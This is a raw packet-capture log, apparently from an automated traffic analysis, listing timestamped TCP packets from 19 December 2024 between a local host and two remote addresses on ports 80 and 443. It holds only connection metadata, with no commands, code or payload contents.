                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.492204905 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.492386103 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.492399931 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.492434978 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.492449045 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.492822886 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.492877007 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.493165016 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.493236065 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.493359089 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.493374109 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.493402004 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.493417025 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.493767977 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.493818998 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.494015932 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.494029999 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.494076967 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.494369030 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.494417906 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.494530916 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.494576931 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.494833946 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.494846106 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.494885921 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.494900942 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.495088100 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.495127916 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.495132923 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.495146990 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.495193005 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.495923996 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.495986938 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.496040106 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.496186972 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.496274948 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.496290922 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.496304035 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.496335983 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.496360064 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.497076988 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.497092009 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.497104883 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.497139931 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.497150898 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.497697115 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.497710943 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.497723103 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.497752905 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.497775078 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.498445034 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.498460054 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.498517036 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.498517036 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.498703957 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.498749018 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.498749971 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.498764038 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.498785019 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.498795033 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.499538898 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.499560118 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.499572992 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.499588966 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.499996901 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.500138044 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.500149965 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.500200033 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.500607967 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.500621080 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.500633955 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.500653028 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.500675917 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.501490116 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.501503944 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.501538038 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.501548052 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.501822948 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.501864910 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.501864910 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.501878977 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.501902103 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.501918077 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.502636909 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.502648115 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.502660036 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.502690077 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.502718925 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.503319025 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.503334045 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.503345966 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.503372908 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.503382921 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.504060984 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.504092932 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.504106045 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.504126072 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.504137993 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.504518032 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.504530907 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.504543066 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.504600048 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.504600048 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.505137920 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.505151987 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.505162954 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.505232096 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.506022930 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.506036997 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.506048918 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.506088018 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.506109953 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.506714106 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.506766081 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.556099892 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.556305885 CET44349749172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.557044983 CET44349750172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.559741974 CET44349751172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.563632011 CET49751443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.563647032 CET44349751172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.563844919 CET49750443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.563863039 CET44349750172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.563999891 CET49749443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.564007998 CET44349749172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.564089060 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.564109087 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.564754963 CET44349751172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.564826012 CET49751443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.564935923 CET44349750172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.565068960 CET49750443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.565198898 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.565248966 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.565502882 CET44349749172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.565571070 CET49749443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.566225052 CET49751443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.566314936 CET44349751172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.567055941 CET49750443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.567111969 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.567123890 CET44349750172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.567186117 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.567240953 CET49749443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.567348003 CET49751443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.567348957 CET44349749172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.567364931 CET44349751172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.567563057 CET49750443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.567572117 CET44349750172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.567589045 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.567596912 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.567672014 CET49749443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.567692995 CET44349749172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.630737066 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.630753994 CET49751443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.631077051 CET49749443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.631079912 CET49750443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.647140026 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.647277117 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.647291899 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.647346973 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.647372961 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.647675037 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.647732019 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.647919893 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.647933006 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.647979021 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.648299932 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.648354053 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.650091887 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.650105000 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.650119066 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.650185108 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.650185108 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.650860071 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.650921106 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.652394056 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.652406931 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.652419090 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.652450085 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.652493954 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.653177023 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.653238058 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.654747009 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.654762030 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.654814005 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.654839039 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.655601978 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.655622959 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.655637026 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.655690908 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.656197071 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.656212091 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.656267881 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.657718897 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.657783985 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.658423901 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.658437967 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.658449888 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.658487082 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.658516884 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.659960985 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.659974098 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.660021067 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.660722017 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.660736084 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.660849094 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.662259102 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.662316084 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.662987947 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.663002014 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.663014889 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.663050890 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.663088083 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.663810015 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.663824081 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.663836956 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.663873911 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.663892984 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.664480925 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.664495945 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.664509058 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.664546013 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.664575100 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.665288925 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.665338039 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.683803082 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.683876038 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.683969975 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.683984995 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.684025049 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.684401989 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.684628010 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.684640884 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.684689999 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.685085058 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.685333014 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.685458899 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.685472012 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.685519934 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.685734034 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.685746908 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.685792923 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.686192989 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.686252117 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.687010050 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.687024117 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.687058926 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.687074900 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.687278032 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.687292099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.687305927 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.687334061 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.687346935 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.688028097 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.688043118 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.688055992 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.688069105 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.688102961 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.688126087 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.688725948 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.689055920 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.689069033 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.689083099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.689100027 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.689127922 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.689834118 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.689857006 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.689884901 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.689912081 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.689950943 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.690619946 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.690639973 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.690677881 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.690711975 CET4974380192.168.2.431.41.244.11
